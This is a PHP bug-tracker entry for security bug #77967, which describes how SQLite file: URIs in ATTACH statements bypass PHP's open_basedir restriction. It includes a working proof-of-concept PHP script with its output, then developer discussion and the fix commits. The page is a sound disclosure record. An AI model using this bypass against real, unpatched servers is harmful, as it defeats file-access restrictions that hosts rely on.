php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #77967 Bypassing open_basedir restrictions via file uris
Submitted: 2019-05-04 10:04 UTC Modified: 2019-05-28 04:36 UTC
From: radimre83 at gmail dot com Assigned:
Status: Closed Package: SQLite related
PHP Version: 7.3.5 OS: Linux
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: radimre83 at gmail dot com
New email:
PHP Version: OS:

 

 [2019-05-04 10:04 UTC] radimre83 at gmail dot com
Description:
------------
Sqlite supports the file: URI handler as part of the DSN string. https://sqlite.org/uri.html

This feature can be abused to bypass the open_basedir restriction configured for PHP.


Test script:
---------------
<?php
file_put_contents("/safe/test.txt", "shall work");
file_put_contents("/unsafe/test.txt", "shall be a warning due to openbasedir");


$db = new SQLite3("/safe/main.db", 0x00000002|0x00000004|0x00000040); // 0x40 is SQLITE_OPEN_URI

chdir("/safe"); // the current working dir must be one of the open basedirs
$db->exec("ATTACH 'file:/unsafe/poc.db' AS sdb;");
$db->exec("CREATE TABLE sdb.t (t TEXT)");
$db->exec("INSERT INTO sdb.t (t) VALUES ('foobar')");
$db->close();


Expected result:
----------------
root@fd7f809a8411:/# /build/php-7.3.5/sapi/cli/php -d open_basedir=/safe /repo-shared/sqlite/sqlite-attach.php

Warning: file_put_contents(): open_basedir restriction in effect. File(/unsafe/test.txt) is not within the allowed path(s): (/safe) in /repo-shared/sqlite/sqlite-attach.php on line 3

Warning: file_put_contents(/unsafe/test.txt): failed to open stream: Operation not permitted in /repo-shared/sqlite/sqlite-attach.php on line 3

Warning: SQLite3::exec(): not authorized in /repo-shared/sqlite/sqlite-attach.php on line 9

Warning: SQLite3::exec(): unknown database sdb in /repo-shared/sqlite/sqlite-attach.php on line 10

Warning: SQLite3::exec(): no such table: sdb.t in /repo-shared/sqlite/sqlite-attach.php on line 11

root@fd7f809a8411:/safe# ls -la /unsafe/
total 16
drwxr-xr-x  2 root root 4096 May  4 09:53 .
drwxr-xr-x 71 root root 4096 May  4 09:46 ..


Actual result:
--------------
root@fd7f809a8411:/# /build/php-7.3.5/sapi/cli/php -d open_basedir=/safe /repo-shared/sqlite/sqlite-attach.php

Warning: file_put_contents(): open_basedir restriction in effect. File(/unsafe/test.txt) is not within the allowed path(s): (/safe) in /repo-shared/sqlite/sqlite-attach.php on line 3

Warning: file_put_contents(/unsafe/test.txt): failed to open stream: Operation not permitted in /repo-shared/sqlite/sqlite-attach.php on line 3

root@fd7f809a8411:/safe# ls -la /unsafe/
total 16
drwxr-xr-x  2 root root 4096 May  4 09:53 .
drwxr-xr-x 71 root root 4096 May  4 09:46 ..
-rw-r--r--  1 root root 8192 May  4 09:53 poc.db



Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-05-05 17:34 UTC] radimre83 at gmail dot com
-Type: Bug +Type: Security -Private report: No +Private report: Yes
 [2019-05-05 17:34 UTC] radimre83 at gmail dot com
Changing bug type to Security.
 [2019-05-06 00:46 UTC] stas@php.net
Since it happens inside SQLITE, I do not think PHP can do anything about it.
 [2019-05-06 05:53 UTC] radimre83 at gmail dot com
"Since it happens inside SQLITE, I do not think PHP can do anything about it."

You already have an authorizer callback (sqlite3_set_authorizer) implemented, that calls php_check_open_basedir() with the parameter of the ATTACH statement. It could be improved to pay special attention to the file: prefix.
 [2019-05-06 11:07 UTC] cmb@php.net
Indeed, PHP should either properly check openbase_dir in
php_sqlite3_authorizer(), or it should reject file URIs altogether
(they are not supported for SQLite3::open() anyway).
 [2019-05-08 09:40 UTC] cmb@php.net
According to a recent discussion[1] on the internals mailing list,
this is likely not a security though.

[1] <http://news.php.net/php.internals/105606>
 [2019-05-09 05:42 UTC] radimre83 at gmail dot com
I agree with the proposal, open_basedir shall be deprecated and then deco'ed eventually.
Until then, people will keep using it as a security feature, I'm afraid.
 [2019-05-28 04:36 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c34895e837b50213c2bb201c612904342d2bd216
Log: Fix bug #77967 - Bypassing open_basedir restrictions via file uris
 [2019-05-28 04:36 UTC] stas@php.net
-Status: Open +Status: Closed
 [2019-05-28 07:07 UTC] cmb@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=d27b4824e667c5ed3eac9c16496777392eae5b03
Log: Fix bug #77967 - Bypassing open_basedir restrictions via file uris
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Mon Sep 23 18:01:26 2019 UTC